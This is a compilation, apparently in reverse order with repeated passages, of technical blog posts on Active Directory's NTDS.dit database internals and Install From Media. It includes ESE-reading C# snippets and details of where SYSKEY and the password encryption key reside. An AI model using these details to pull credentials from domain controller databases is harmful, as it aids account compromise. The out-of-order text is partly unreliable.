// Simplified:
// Method to obtain a list of tables for a given JET database
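The original snippet is abbreviated here. As a hedged illustration of the same idea, the open-source ManagedEsent wrapper (Microsoft.Isam.Esent.Interop, which wasn’t available when we started) exposes Api.GetTableNames; the file name and parameters below are assumptions for the sketch:

```csharp
using System;
using Microsoft.Isam.Esent.Interop; // ManagedEsent package, assumed available

class ListTables
{
    static void Main()
    {
        JET_INSTANCE instance;
        Api.JetCreateInstance(out instance, "esedump");
        // NTDS.dit uses 8 KB pages; recovery is off since we open read-only
        Api.JetSetSystemParameter(instance, JET_SESID.Nil, JET_param.DatabasePageSize, 8192, null);
        Api.JetSetSystemParameter(instance, JET_SESID.Nil, JET_param.Recovery, 0, "off");
        Api.JetInit(ref instance);

        JET_SESID sesid;
        Api.JetBeginSession(instance, out sesid, null, null);
        Api.JetAttachDatabase(sesid, "NTDS.dit", AttachDatabaseGrbit.ReadOnly);
        JET_DBID dbid;
        Api.JetOpenDatabase(sesid, "NTDS.dit", null, out dbid, OpenDatabaseGrbit.ReadOnly);

        // Enumerate the tables in the database (datatable, link_table, sd_table, ...)
        foreach (string table in Api.GetTableNames(sesid, dbid))
            Console.WriteLine(table);

        Api.JetTerm(instance);
    }
}
```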
In Part 3 we discussed the usage of the “Ancestors_col” column and how it’s used to walk subtrees in the database; the DNTs are stored as bytes within the “Ancestors_col” and are read as in the code snippet below.
Table 3: Ancestors_col
Code Snippet
if (column.err != EseErrors.ColumnNull)
{
string ancestry = null;
// Walk through every ancestry record in the returned column data
// Construct the ancestry string with the returned DNTs
for (int i = 0; i < column.GetData().Length; i += sizeof(int))
{
int dnt = BitConverter.ToInt32(column.GetData(), i);
ancestry = (ancestry == null) ? dnt.ToString() : ancestry + "," + dnt;
}
}
Note: This is our way to read an object’s full distinguished name given its DNT (Distinguished Name Tag). But this is not considered safe by the DSA, as mentioned in Part 3, because the “Ancestors_col” is processed by a background task and might not be in sync at all times. (Safer would be to walk the tree up, by each PDNT, until PDNT == 2.)
Table 4: Get an object’s distinguished name by its DNT
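The snippet for Table 4 did not survive in this copy, so here is a reconstruction of the safer approach just described: seek the row by its DNT, read its RDN and PDNT, and repeat until the root (DNT 2). The in-memory dictionary standing in for the datatable, and the sample DNT values, are illustrative assumptions loosely based on the examples in this series:

```csharp
using System;
using System.Collections.Generic;

class DnByDnt
{
    // Hypothetical in-memory stand-in for the datatable: DNT -> (RDN "Name", PDNT).
    // DNT 2 is the root row; in ESEDump this lookup is a seek on the DNT primary index.
    static readonly Dictionary<int, (string Name, int Pdnt)> Rows =
        new Dictionary<int, (string, int)>
    {
        { 1787, ("com", 2) },
        { 1788, ("chrisse", 1787) },
        { 1789, ("corp", 1788) },
        { 1790, ("ntdev", 1789) },
        { 5524, ("Christoffer Andersson", 1790) }, // illustrative PDNT
    };

    static string GetDistinguishedName(int dnt)
    {
        var parts = new List<string>();
        while (dnt != 2) // walk each PDNT up until the root
        {
            var row = Rows[dnt];
            parts.Add(row.Name);
            dnt = row.Pdnt;
        }
        // RDNs are collected leaf-first, which is the DN component order
        // (RDN type prefixes such as CN=/DC= are omitted for brevity)
        return string.Join(",", parts);
    }

    static void Main() => Console.WriteLine(GetDistinguishedName(5524));
}
```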
This is the third post in a series of articles that describe what’s really inside NTDS.dit and how Active Directory works at the database layer; the past two articles have been about:
Given the knowledge from the last article in the series on how objects refer to each other in terms of a parent-child relation (DNT and PDNT), it becomes obvious that it is easy to get all direct-descendant/child objects of a given object by searching for all objects (rows) that have a specific PDNT (where objects.PDNT == parent.DNT). This can efficiently be achieved by using the “PDNT_index”.
[1.1]: “Name” represents the RDN attribute; it’s not stored/named as described in the illustration above, but rather stored as “ATTm589825”. I chose to represent it as “Name” to simplify the understanding.
Introducing the Ancestors_col and support for subtree searches
Support for subtree searching requires the implementation of another column at the DBLayer, the “Ancestors_col”; we are already familiar with the other columns from the last post in the series.
Table 2: datatable – Simplified for hierarchy representation 2
Every object/phantom within the “datatable” contains a unique DNT value.
ESE enforces uniqueness by declaring DNT to be an ESE auto-incrementing column (JET_bitColumnAutoincrement.)
DNT is the primary key of the “datatable”, so objects are clustered in storage by DNT, and access to an object by DNT is more efficient than access via any other column/attribute. Since new objects are created in ascending DNT order, the primary key organization does not slow down the creation of new objects.
The PDNT column holds the DNT of the parent of an object.
The tree structure of objects is not represented by pointers from parent to child, as you might expect given how the tree is normally browsed, but by a pointer in each child object/row to its parent
The Ancestors_col holds the DN path [2.1] (every DNT from the root of the hierarchy down to the object’s DNT) in a binary blob. This allows efficient subtree searches by searching the Ancestors_col with a prefix of DNTs ending at the object the search is rooted at [2.2]
[2.1]: The first object/row within the “datatable” always has a NULL Ancestors_col value. [2.2] See “Table 4: Ancestors_index”
Let’s apply “Table 2” to a theoretical sample:
[3.1]: “Name” represent the RDN attribute, it’s not stored/named as described in the illustration above, it’s rather stored as “ATTm589825” I choose to represent it as “Name” for simplifying the understanding
If we wanted to do a subtree search with the “Windows Development” organizational unit as the search base, we would use an index over the “ancestors_col” [4.1] and set the prefix to “2,1787,1788,1789,1790,5520,5521*”; that would return a list of all objects (rows) that are subordinate to the “Windows Development” organizational unit (e.g. all children).
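The prefix above is really just the DNT path serialized to bytes. A minimal sketch of how such a prefix key could be built, assuming the DNTs are stored as 4-byte little-endian integers as described earlier in this series (the actual key normalization ESE applies is not shown):

```csharp
using System;
using System.Linq;

class AncestorsPrefix
{
    static void Main()
    {
        // DNT path from the root down to the "Windows Development" OU,
        // taken from the sample in this post
        int[] path = { 2, 1787, 1788, 1789, 1790, 5520, 5521 };

        // The Ancestors_col stores each DNT as 4 bytes, so the subtree-search
        // prefix is simply the concatenated byte form of the path
        byte[] prefix = path.SelectMany(BitConverter.GetBytes).ToArray();

        // Any row whose Ancestors_col starts with this prefix is in the subtree;
        // with ESE this would be a partial-key seek over the Ancestors index
        Console.WriteLine(BitConverter.ToString(prefix));
    }
}
```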
The ancestors_col and SDProp (the Security Descriptor Propagation Daemon) – how are they related?
The “ancestors_col” complicates an object move (within the same NC/database; we leave cross-NC/database moves outside this article to simplify understanding).
Given the knowledge from the last article in the series on how objects refer to each other in terms of a parent-child relation (DNT and PDNT), it seems easy to implement an object move by simply changing the PDNT to the DNT of the new designated parent (e.g. give “Christoffer Andersson” a value of “5521” in his “PDNT_col”, and the object is now subordinate to the organizational unit “Windows Development” instead of “Users” in the above sample).
After the operation above, the “Ancestors_col” wouldn’t be accurate, so it needs “fixup” (e.g. it needs to be adjusted to the new path “2,1787,1788,1789,1790,5520,5521,5524”; “5522” has to be removed as we moved the object “Christoffer Andersson” from the “Users” organizational unit to the “Windows Development” organizational unit). This might not seem to be an issue at first glance, but imagine moving a large subtree: the operation wouldn’t fit into a single atomic transaction, therefore ancestry fixup is performed in the background by SDProp (the Security Descriptor Propagation Daemon) [4.1]
Most experienced Active Directory administrators have at least heard of “SDProp”, which is short for the Security Descriptor Propagation Daemon, and some know that it’s responsible for handling propagation of ACE inheritance; very few probably know that it is, in addition, also responsible for maintaining the Ancestors_col at the DBLayer.
Each DSA/DC runs SDProp (the Security Descriptor Propagation Daemon) as a background task (TQ_TASK). By default, this task is triggered by the following conditions:
Any modification (originating or replicated) of the nTSecurityDescriptor attribute of any object (except for modifications done by the SDProp daemon itself)
This requires that any new/modified inheritable ACEs are propagated to all descendant objects and that any removed inheritable ACEs are removed from all descendant objects; ACE inheritance is not replicated and is applied by SDProp using this process on all DSAs/DCs.
Any modification of the “PDNT_col” of an object (i.e. the object is being moved in the directory) that results in the object having a different parent (except for cases where the new parent is the Deleted Objects container)
This requires adjustments of the values (DNTs) stored in the “ancestors_col”, as the object/row has been moved.
This also requires that all inheritable ACEs present on the new parent object (and all its ancestors from the top) are propagated down to the object, and that inheritable ACEs originating from the previous parent (and all its ancestors from the top) have to be removed.
SDProp is responsible for propagation of inheritable ACEs: if inheritable ACEs are added to or removed from an object’s SD (Security Descriptor), SDProp is responsible for propagating those ACEs to all descendant/child objects of the object where the ACEs were added. [4.2]
Ancestors_col fixup
If any modification to an object’s parent “PDNT_col” occurs (simply, an object move), SDProp is responsible for adjusting the “ancestors_col” to match the full path of DNTs from the top down to the object with respect to its new parent.
[4.1] Since this work is performed in the background, and SDProp (which runs on a single thread) doesn’t implement a limit on how many transactions are used to perform an operation, there may be a period of time when Active Directory returns query results inconsistent with the tree structure, and inheritable ACEs won’t be accurate.
[4.2]: A common misunderstanding is that SDProp is responsible for maintaining protection for objects that are protected by AdminSDHolder. That’s incorrect. AdminSDHolder runs in its own background task (TQ_TASK) every 60 minutes on the PDC (if a protected object’s security descriptor differs from the one at the adminSDHolder object, inheritance is turned off and the security descriptor is overwritten with the one at the adminSDHolder object), and that AdminSDHolder background task in turn triggers SDProp.
Triggering SDProp manually from the outside
It’s possible to use an operational attribute to trigger the SDProp daemon to run from the “outside” (e.g. performed by an administrator). However, on a fully functional DSA/DC there is no need to invoke SDProp manually. SDProp can be triggered globally or for a specific object/row identified by its DNT; the requester must have the “Recalculate-Security-Inheritance” control access right on the nTDSDSA object for the DSA/DC.
The following shows an LDIF sample that performs this operation on the entire DIT.
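The LDIF sample itself did not survive in this copy. As best I can reconstruct it, it is a rootDSE modify of the operational attribute commonly documented as fixupInheritance (the attribute name here is my assumption, carried from Microsoft’s SDProp documentation rather than from the original post):

```ldif
dn:
changetype: modify
add: fixupInheritance
fixupInheritance: 1
-
```

Such a file would typically be imported with ldifde -i -f <file>.ldf against the DSA/DC in question.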
This is the second post in a series of articles that describe what’s really inside NTDS.dit and how Active Directory works at the database layer. In an earlier post I explained the tables within NTDS.dit in detail: what they are used for, in which release of Active Directory (Windows Server) they were introduced, as well as any major changes added in later versions: How the Active Directory – Data Store Really Works (Inside NTDS.dit) – Part 1
This post will go into the details of the contents of the “datatable”, also known as the object store. It contains all objects and phantoms [1.1], represented as rows (1 object/phantom = 1 row in the table), from any instanced naming context (NC) held as either writable or read-only (until they are physically removed by the garbage collector) by the Directory System Agent (DSA) hosting the database; columns represent every [1:3] attribute present in the schema except linked attributes [1:2]
[1.1]: Phantoms are references to objects hosted outside the given database (NTDS.DIT) and the given Directory System Agent (DSA) – (except structural phantoms)
[1:2] Post-Windows Server 2003 the attribute “ntSecurityDescriptor” is stored in the “sd_table” rather than in the “datatable”
[1:3] Some columns don’t reflect attributes and are pre-defined in the NTDS.dit template database generated by Microsoft (those are needed for internal state of the DSA)
Maintain the hierarchy of an object tree within a flat object store
The hierarchy in Active Directory is quite obvious to most of us at a simplified level, e.g. daily administrative tasks such as creating an Organizational Unit and creating several descendant/child objects underneath it. Some people may refer to some objects as leaf objects (objects that usually don’t contain descendant/child objects), such as objects of the class “user”. However, the fact is that any object within Active Directory technically has the possibility to contain one or more descendant/child objects; this is controlled by schema constraints, and more specifically by the sum of the following attributes of a given object class and any inherited class (except for auxiliary classes):
Table 1: Possible Superiors
Attribute
Description
possSuperiors
Contains references to object classes that can host the given class as a descendant/child object.
possSuperiors can be modified on both cat1 and cat2 schema class objects after they have been instantiated in the schema.
systemPossSuperiors
Contains references to object classes that can host the given class as a descendant/child object.
systemPossSuperiors can’t be modified from the outside once the class has been instantiated in the schema.
Why it’s easy for all objects to host descendants/child objects becomes more obvious when the hierarchy is explained at the DBLayer.
The question remains, given the details above: if one row within the “datatable” represents an object/phantom, how can the hierarchy be maintained? “Table 2” below represents the columns in the “datatable” that are vital for representing/building the hierarchy in the directory at the DBLayer.
Table 2: datatable – Simplified for hierarchy representation 1
Every object/phantom within the “datatable” contains a unique DNT value.
DNT is a short for distinguished name tag.
ESE enforces uniqueness by declaring DNT to be an ESE auto-incrementing column (JET_bitColumnAutoincrement.)
DNT is the primary key of the “datatable”, so [2.1] objects are clustered in storage by DNT, and access to an object by DNT is more efficient than access via any other column/attribute. Since new objects are created in ascending DNT order, the primary key organization does not slow down the creation of new objects.
The PDNT column holds the DNT of the parent of an object [2.2].
PDNT is a short for parent distinguished name tag.
The tree structure of objects is not represented by pointers from parent to child, as you might expect given how the tree is normally browsed, but by a pointer in each child object/row to its parent
[2.1]: The maximum number of objects/phantoms that can ever be created on a given DSA (Domain Controller) for its entire lifetime is roughly 2 billion (2,147,483,393 = 2^31 minus 255). Note that this counts objects/phantoms ever introduced to the local DSA as part of any naming context (NC), writable or partial, ever hosted by the DSA. * If the DSA is promoted by using IFM (Install From Media), it inherits the count of already allocated DNTs from the former DSA. When the maximum number of auto-increment values has been used (the limit mentioned above has been hit), the following error is returned at the DBLayer: JET_errOutOfAutoincrementValues -1076; from the outside we will notice: “Error: Add: Operations Error. <1> Server error: 000020EF: SvcErr: DSID-0208044C, problem 5012 (DIR_ERROR), data -1076.” Read more about Active Directory limits: http://technet.microsoft.com/en-us/library/active-directory-maximum-limits-scalability(v=ws.10).aspx#BKMK_Objects
[2.2]: The first row introduced in the “datatable” isn’t a real object, nor is it a phantom; it is named “$NOT_AN_OBJECT1$” and has its PDNT_col set to NULL. The “PDNT_col” is indexed, so it becomes very easy to derive an object’s direct descendants/child objects (not all descendants) by simply querying for rows that have the object’s DNT in their PDNT_col.
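The indexed PDNT_col lookup just described can be sketched in code. This is not ESEDump code; it is a hedged illustration using the ManagedEsent wrapper (Microsoft.Isam.Esent.Interop), assuming a cursor opened on the datatable as in the earlier snippets and the index name “PDNT_index” from this post (the real index also covers the RDN, which a partial key handles):

```csharp
using Microsoft.Isam.Esent.Interop; // ManagedEsent, assumed available

static class DirectChildren
{
    // Enumerate direct children of parentDnt: rows where objects.PDNT == parent.DNT
    static void ListChildren(JET_SESID sesid, JET_TABLEID tableid, int parentDnt)
    {
        Api.JetSetCurrentIndex(sesid, tableid, "PDNT_index");

        // Seek to the first row whose key starts with the parent's DNT
        Api.MakeKey(sesid, tableid, parentDnt, MakeKeyGrbit.NewKey);
        if (!Api.TrySeek(sesid, tableid, SeekGrbit.SeekGE))
            return; // no children

        // Constrain the scan to rows sharing that DNT prefix
        Api.MakeKey(sesid, tableid, parentDnt,
            MakeKeyGrbit.NewKey | MakeKeyGrbit.FullColumnEndLimit);
        if (!Api.TrySetIndexRange(sesid, tableid,
            SetIndexRangeGrbit.RangeUpperLimit | SetIndexRangeGrbit.RangeInclusive))
            return;

        do
        {
            // Each row here is a direct child of parentDnt;
            // retrieve its DNT / name columns as needed
        } while (Api.TryMoveNext(sesid, tableid));
    }
}
```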
[2:3] The DSA has an in-memory cache for the most common RDNs (the ones mentioned above). Active Directory also allows us to use a custom attribute as the RDN by specifying the attributeID of that custom attribute as the rDNAttID for the particular class. * An RDN attribute must have a string syntax. ** Customization may not be supported by all LDAPv3 clients. *** rDNAttID should preferably be set before any objects of the given class are instanced in the directory (changes won’t apply to already instanced/existing objects).
Let’s apply “Table 2” to a theoretical sample:
[3.1]: “Name” represents the RDN attribute; it’s not stored/named as described in the illustration above, but rather stored as “ATTm589825”. I chose to represent it as “Name” to simplify the understanding of the hierarchy in this case.
[3.2] A structural phantom (different from a phantom used for referential integrity to real objects hosted outside the given DIT) is used to represent the full distinguished name of the domain, e.g. “DC=ntdev,DC=corp,DC=chrisse,DC=com”
In the next article we will continue the deep-dive into the content and the structure of the “datatable”, going through things like ancestors, the difference between phantoms and real objects, tombstones and the garbage collector at the DBLayer, and much more.
You might, as I have, have asked yourself many times: what is inside NTDS.dit? (Most experienced Active Directory admins know that NTDS.dit is the database and the physical on-disk store that Active Directory uses to store information; most of you have probably come in touch with NTDS.dit during backup and restore scenarios.)
Long story short: I wasn’t satisfied not knowing, nor was I after reading the following article (which I actually think isn’t that bad, and is probably the most detailed publicly available information on the subject): [1] http://technet.microsoft.com/en-us/library/cc772829(WS.10).aspx
So I decided, with a very good friend of mine, Stanimir Stoyanov (Microsoft Visual C# MVP), to go ahead and build a tool that could read NTDS.dit and decode its internals. Then we started a journey that has given us invaluable knowledge about this part of Active Directory. This is the first article in a series of articles that will describe what’s really inside NTDS.dit and how Active Directory works at the database layer.
The illustration below has been presented in various documentation since Active Directory was initially released over 10 years ago; a similar illustration is also available in [1] (however, after this research project it’s actually turning out to be inaccurate in some aspects, in the way the DRA/REPL communicates with the DBLayer).
Table 1: DSA Components (Simplified for the DBLayer)
Component
Description
Ntdsa.dll – Directory System Agent
The DSA, which runs as Ntdsa.dll on each domain controller, provides the interfaces through which directory clients and other directory servers gain access to the directory database (the DBLayer). In addition, the DSA enforces directory semantics, maintains the schema, guarantees object identity, and enforces data types on attributes.
Esent.dll – Extensible Storage Engine (ESE) APIs
The Extensible Storage Engine (ESE) is an advanced indexed and sequential access method (ISAM) storage technology. ESE enables applications to store and retrieve data from tables using indexed or sequential cursor navigation. It supports denormalized schemas including wide tables with numerous sparse columns, multi-valued columns, and sparse and rich indexes. It enables applications to enjoy a consistent data state using transacted data update and retrieval.
Ntds.dit
The physical on-disk file that represents the ESE/JetBlue database holding the information store for the given DSA/Active Directory Domain Controller.
Data Store Physical Structure / Inside NTDS.dit – Tables
Finally we can start looking into the content/internal structure of NTDS.dit, but first let’s take a look at what has been revealed before. The illustration below is from [1] and is accurate except for the contents of the white box that represents the tables within the database; the tables shown do exist (except for * “sd_table”, which is absent on Windows 2000 DSAs), but there are more tables that aren’t mentioned in this example.
So it’s about time to reveal the real table structure of an NTDS.dit database file – It’s time to use the tool we produced to first discover this:
Table 2: NTDS.DIT – Tables
Table
Description
Minimum DSA Version
Datatable
Contains all objects and phantoms [2.1] represented as rows (1 object/phantom = 1 row in the table) from any instanced naming context (NC) held as either writable or read-only by the Directory System Agent (DSA) hosting the database, where columns represent every [2:3] attribute present in the schema except linked attributes [2:2]
[2.1]: Phantoms are references to objects hosted outside the given database (NTDS.DIT) and the given Directory System Agent (DSA)
[2:2] Post-Windows Server 2003 the attribute “ntSecurityDescriptor” is stored in the “sd_table” rather than in the “datatable”
[2:3] Some columns don’t reflect attributes and are pre-defined in the NTDS.dit template database generated by Microsoft (those are needed for internal state of the DSA)
Windows 2000 Server
Note: Windows Server 2008 R2 added a column to support the “is-Recycled” state
Hiddentable
Contains one row but several columns that define the state of the database, as well as the [2:4] DNT (reference) of the NTDS Settings object that represents this DSA (used for finding configuration information specific to this domain controller.)
[2:4] The concept of DNTs (Distinguished Name Tags)
Windows 2000 Server Note: Windows Server 2003 Introduced additional state columns such as backupexpiration_col
Link_table
Contains link-pair references (DNT, DNT), the link base (link id >> 1) and possibly a binary blob (In case of DN-binary, DN-string syntax)
Windows 2000 Server
Note: Windows Server 2008 R2 added a column to support deactivated links for recycle-bin
Sd_table
Contains single-instance-stored SDs (Security Descriptors) that pre-Windows Server 2003 were stored in the ntSecurityDescriptor attribute in the “datatable”; objects now instead reference the SDs in the “sd_table”. That is, if more than one object has exactly the same security defined (Security Descriptor), both objects reference the same row in the “sd_table”, hence the single-instance storage, reducing the size needed to store Security Descriptors.
Windows Server 2003.
Sdpropcounttable
Used by the Security Descriptor Propagation Daemon (SDProp), responsible for Security Descriptor inheritance down the tree within the local database
Sdproptable
Used by the Security Descriptor Propagation Daemon (SDProp), responsible for Security Descriptor inheritance down the tree within the local database
Windows 2000 Server
Quota_rebuild_progress_table
Contains temporary information during a quota tracking rebuild for the Active Directory quota feature introduced in Windows Server 2003; this allows the daemon to keep track of processed objects.
Windows Server 2003
Quota_table
Contains quota tracking information for the Active Directory quota feature introduced in Windows Server 2003; quota tracking is per naming context (NC) and for a given security principal identified by its SID.
Windows Server 2003
MSysObjects
ESE Internals – out of scope for this article
N/A
MSysObjectsShadow
ESE Internals – out of scope for this article
N/A
MSysUnicodeFixupVer2
ESE Internals – out of scope for this article
N/A
In the next article – we will take a deep-dive into the content and the structure of the “datatable” also known as the object-store.
This is the second and last blog post (if someone really cares about the differences for ADAM/AD LDS, I can point those out too – just send me an e-mail) completing a series of posts covering how the “Install from Media” feature really works. It’s an in-depth, very technical series of posts that explains what happens under the hood, and this second post explains the changes regarding this feature that were introduced with Windows Server 2008 (most of the changes made are to support RODCs, as you will notice if you continue to read).
Note: This article covers Windows Server 2003 Install From Media (IFM) functionality plus the changes made in Windows Server 2008 and later (it doesn’t go through the functionality that has been left unchanged from Windows Server 2003 again, so I recommend reading part 1 first: How install from media (IFM) really works (Part 1))
Background
Install from media was first introduced in Windows Server 2003, mainly as a solution to improve the installation experience of newly promoted domain controllers in branch offices (or sites with slow links where the initial replication could take significant time to complete), but it is actually an important component in many disaster recovery plans I have designed for various customers over the years, as it is a fast and efficient way to re-install a domain controller and get it back in sync (that’s the proper way to handle faulting replicas/domain controllers in most cases). The feature was changed substantially in Windows Server 2008 and later so that the new type of DC, the Read Only Domain Controller, could be supported by Install from Media (IFM), or as it is sometimes referred to, RIFM; there have also been some improvements in the ability to produce install from media (IFM) without taking a regular backup.
What does Install from Media (IFM) consist of
Install from media (IFM) consists of three important things.
NTDS.DIT (Active Directory Database) – at the time the IFM is generated (regardless of Windows Server 2003, Windows Server 2008 or later), the NTDS.dit is pretty much unchanged until DCPROMO makes a lot of changes on the becoming domain controller that takes use of the database – it will change the DSA reference and update related “instance specific” information in the hidden table. However, this differs for RIFMs, i.e. Read-Only Domain Controller install from media.
SYSVOL (SYSVOL GPT Storage)
Registry – contains the SYSKEY used to decrypt the PEK (also known as the Password Encryption Key), which ensures that the protection for sensitive information stored in the Active Directory database (such as password hashes) is unique to each instance of the database (read: each domain controller). Note: This doesn’t apply to RODCs.
Sourcing install from media (IFM) using System State and VSS
Sourcing the media used by IFM is different between Windows Server 2003 (all versions) and Windows Server 2008 and later; the difference is the technology used to gather the required information. Windows Server 2008 and later uses VSS, with the NTDS (Active Directory Domain Services) VSS writer and the Registry VSS writer, to source the information required to construct an IFM. Note: the Registry doesn’t apply to RODCs.
Table 1: VSS Writers used by install from media
Name
Description
Guid
Registry Writer
The registry writer is responsible for the Windows registry. Beginning with Windows Vista and Windows Server 2008, the registry writer now performs in-place backups and restores of the registry. On versions of Windows prior to Windows Vista, the registry writer used an intermediate repository file (sometimes called a “spit file”) to store registry data.
In Windows Vista and later, the registry writer does not report user hives.
The writer ID for the registry writer is AFBAB4A2-367D-4D15-A586-71DBB18F8485.
NTDS Writer
Beginning with Windows Server 2003, this writer reports the NTDS database file (ntds.dit) and the associated log files. These files are required to restore the Active Directory correctly.
There is only one ntds.dit file per domain controller, and it is reported in the writer metadata as in the following example:
<DATABASE_FILES path="C:\Windows\NTDS"
filespec="ntds.dit"
filespecBackupType="3855"/>
Here is an example that shows how to list components in the writer’s metadata:
<BACKUP_LOCATIONS>
<DATABASE logicalPath="C:_Windows_NTDS"
componentName="ntds"
caption="" restoreMetadata="no"
notifyOnBackupComplete="no"
selectable="no"
selectableForRestore="no"
componentFlags="3">
<DATABASE_FILES path="C:\Windows\NTDS"
filespec="ntds.dit"
filespecBackupType="3855"/>
<DATABASE_LOGFILES path="C:\Windows\NTDS"
filespec="edb*.log"
filespecBackupType="3855"/>
<DATABASE_LOGFILES path="C:\Windows\NTDS"
filespec="edb.chk"
filespecBackupType="3855"/>
</DATABASE>
</BACKUP_LOCATIONS>
At backup time, the writer sets the backup expiration time in the writer’s backup metadata. Requesters should retrieve this metadata by using IVssComponent::GetBackupMetadata to determine whether the database has expired. Expired databases cannot be restored.
If the computer that contains the NTDS database is a domain controller, the backup application should always perform a system state backup across all volumes containing critical system state information. At restore time, the application should first restart the computer in Directory Services Restore Mode and then perform a system state restore.
The writer ID for this writer is B2014C9E-8711-4C5C-A5A9-3CF384484757.
Sourcing install from media (IFM) in Windows Server 2008 and later with NTDSUTIL
Windows Server 2008 introduces a new context in the NTDSUTIL command-line tool, giving us a built-in way to produce install from media instead of having to perform and restore a backup as in Windows Server 2003.
The new context is named "IFM" and is designed to produce install from media (IFM) for the following cases.
Table 2: NTDSUTIL IFM options
Name
Notes
Source
Destination
Full IFM
Note: If the SYSVOL tree is located on the same volume as the database, its log files and/or the registry, it will still be included in the snapshot but not copied into the IFM media.
Note: The NTDS VSS writer is invoked, and as a result we can see that the ‘state_col’ in the ‘hiddentable’ of the ntds.dit database is changed to 4, indicating a backed-up database. This flag is only set if the NTDS VSS writer is used, not for legacy backups.
This command can only be performed on full/writable DCs
This IFM media can only be used to promote full DCs (technically, unless instanceType is changed recursively on all NCs)
Full IFM with SYSVOL
Same as above +
Note: The full SYSVOL tree will be copied to the IFM media, except DfsrPrivate Folders.
This command can only be performed on full/writable DCs
This IFM media can only be used to promote full DCs (technically, unless instanceType is changed recursively on all NCs)
RODC IFM
Note: The NTDS VSS writer is invoked with a "special" secrets flag in this case, deleting all columns in the database that contain a secret attribute, a hidden attribute, or an attribute that has been marked as part of the "filtered attribute set" in the schema.
Note: The PEK (Password Encryption Key), stored in "pekList", is not marked secret (it can't be, as it's the master key used to protect the secret attributes/columns); it is instead marked as a hidden attribute. This means that at this point we have cleared out the master key used to decrypt any other secrets in the DB; however, those secrets have also just been cleared, so this makes it doubly safe.
NTDSUTIL will remove link values for linked attributes that are marked as "filtered attribute set" in the schema (this is not done by the NTDS VSS writer), and if the command is performed on a full/writable DC, all objects including NC heads will recursively have their instanceType changed, clearing the 0x4 WRITE flag.
Note: In Windows Server 2008 R2 a check is performed against the domain functional level (DFL), and the command fails if we're below Windows Server 2003 DFL with "Can't produce RODC IFM media for down-level instances". In my opinion this is an error/mistake in the product, as RODCs require Windows Server 2003 forest functional level (FFL), not DFL; furthermore, there is no issue producing RODC IFM media while the DFL is, for example, Windows 2000 Native, then raising the FFL to Windows Server 2003 and introducing an RODC using media created before the FFL was raised.
Experienced administrators can actually bypass this check, but I won't include those steps here.
This command can be performed on full/writable DCs as well as Read-Only DCs
This IFM media can only be used to promote RODCs
(technically, unless instanceType is changed recursively on all NCs)
RODC IFM with SYSVOL
Same as above +
Note: The full SYSVOL tree will be copied to the IFM media, except DfsrPrivate Folders.
This command can be performed on full/writable DCs as well as Read-Only DCs
This IFM media can only be used to promote RODCs
(technically, unless instanceType is changed recursively on all NCs)
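The column-stripping rule described for RODC IFM media can be sketched as follows. This is an illustrative model, not the real NTDSUTIL code: the flag names, flag values, and the tiny dict-based "schema" are all assumptions made for the example.

```python
# Illustrative sketch: deciding which attribute columns an RODC IFM build
# would clear. Flag names/values are invented for this example.
SECRET = 0x1          # attribute holds secret data (e.g. unicodePwd)
HIDDEN = 0x2          # hidden attribute (e.g. pekList)
FILTERED_SET = 0x4    # member of the RODC "filtered attribute set"

def strip_for_rodc_ifm(attr_flags: int) -> bool:
    """Return True if the column should be cleared when producing RODC media."""
    return bool(attr_flags & (SECRET | HIDDEN | FILTERED_SET))

# Hypothetical mini-schema for illustration only:
schema = {
    "unicodePwd": SECRET,
    "pekList": HIDDEN,            # the master key is hidden, not secret (see note above)
    "someFilteredAttr": FILTERED_SET,
    "sAMAccountName": 0,          # ordinary attribute, kept
}
stripped = sorted(a for a, f in schema.items() if strip_for_rodc_ifm(f))
```

Ordinary attributes survive; anything secret, hidden, or in the filtered attribute set is physically cleared from the media.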
Once the snapshot is performed by the VSS writers, the snapshotted volumes are mounted. There will be one mount point entry for each drive that contains one of the following:
NTDS.dit – Active Directory database
Log files – Active Directory database log files (technically never included/copied to the IFM media, but needed by the NTDS writer itself).
Registry – the SYSTEM and SECURITY hives (these are not copied for Read-Only Domain Controller IFM, or "rifm")
SYSVOL – SYSVOL is only included if requested (Full IFM with SYSVOL or RODC IFM with SYSVOL)
That means that if all of the above (A, B, C, D) are located on the C: drive, there will only be one mount point for the C: drive. Once one or more mount points have been created, the data listed in (A, B, C, D) is copied over into the following structure:
Table 3: IFM on disk structure
Folder Name
Content
Active Directory
NTDS.dit – Active Directory database
Registry
SYSTEM and SECURITY – registry hives (Except for RODCs)
SYSVOL
The full SYSVOL tree – only if requested in NTDSUTIL
Conversions taking place in DCPROMO for Read-Only Domain Controllers.
If a Read-Only Domain Controller (RODC) is being promoted using RODC IFM media generated from a full DC, the following conversions have to take place.
The values of the attribute msDS-hasMasterNCs are moved into msDS-hasFullReplicaNCs
The binary portion of msDsHasInstantiatedNCs is changed from indicating writable NCs instantiated to non-writable NCs instantiated.
Update msds-NCType:
The Schema NC is updated to contain: NCT_SPECIAL_SECRET_PROCESSING
The Domain and Configuration NCs and any hosted NDNCs are updated to contain: NCT_SPECIAL_SECRET_PROCESSING | NCT_FILTERED_ATTRIBUTE_SET
Any partial NCs (present if the DC the IFM was sourced from was a full DC and a GC) are updated to contain: NCT_FILTERED_ATTRIBUTE_SET
Note: These conversions are only necessary when an RODC is being promoted with IFM media that was sourced from a full DC.
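The conversion steps above can be sketched in a few lines. This is a simplified model, not DCPROMO itself: the dict-based "NC head", the `writableInstance` field, and the numeric flag values are assumptions; only the attribute and flag names come from the text.

```python
# Illustrative sketch of the DCPROMO conversions when promoting an RODC
# from media sourced on a full DC. Flag values here are invented.
NCT_SPECIAL_SECRET_PROCESSING = 0x1
NCT_FILTERED_ATTRIBUTE_SET = 0x2

def convert_for_rodc(nc_head: dict) -> dict:
    nc = dict(nc_head)
    # 1. msDS-hasMasterNCs values move into msDS-hasFullReplicaNCs
    if "msDS-hasMasterNCs" in nc:
        nc["msDS-hasFullReplicaNCs"] = nc.pop("msDS-hasMasterNCs")
    # 2. msDsHasInstantiatedNCs: writable -> non-writable instancing
    nc["writableInstance"] = False
    # 3. msds-NCType updates depend on which NC this head represents
    if nc["nc"] == "schema":
        nc["msds-NCType"] = NCT_SPECIAL_SECRET_PROCESSING
    elif nc["nc"] in ("domain", "configuration", "ndnc"):
        nc["msds-NCType"] = (NCT_SPECIAL_SECRET_PROCESSING
                             | NCT_FILTERED_ATTRIBUTE_SET)
    elif nc["nc"] == "partial":
        nc["msds-NCType"] = NCT_FILTERED_ATTRIBUTE_SET
    return nc
```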
Preventing an invalid database to be used by IFM
There are several checks during a DCPROMO IFM promotion to determine that the database being used is valid according to a few rules.
